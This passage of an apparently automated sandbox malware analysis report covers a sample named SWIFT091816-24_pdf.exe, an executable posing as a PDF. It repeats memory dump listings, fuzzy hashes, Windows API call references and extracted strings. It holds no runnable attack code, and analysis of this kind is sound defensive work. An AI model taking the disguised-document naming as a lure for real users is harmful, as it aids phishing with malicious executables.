                                                                                                                                • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                                • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                • String ID: -B@$Call$N$open
                                                                                                                                • API String ID: 3615053054-1446803726
                                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                APIs
                                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                • API String ID: 222337774-899692902
                                                                                                                                • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                • String ID: @Hmu
                                                                                                                                • API String ID: 4216380887-887474944
                                                                                                                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                Strings
                                                                                                                                • "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe", xrefs: 0040632D
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                • *?|<>/":, xrefs: 0040633B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-3212668207
                                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                • MulDiv.KERNEL32(0006A2FA,?,0006A2FE), ref: 00402D4D
                                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
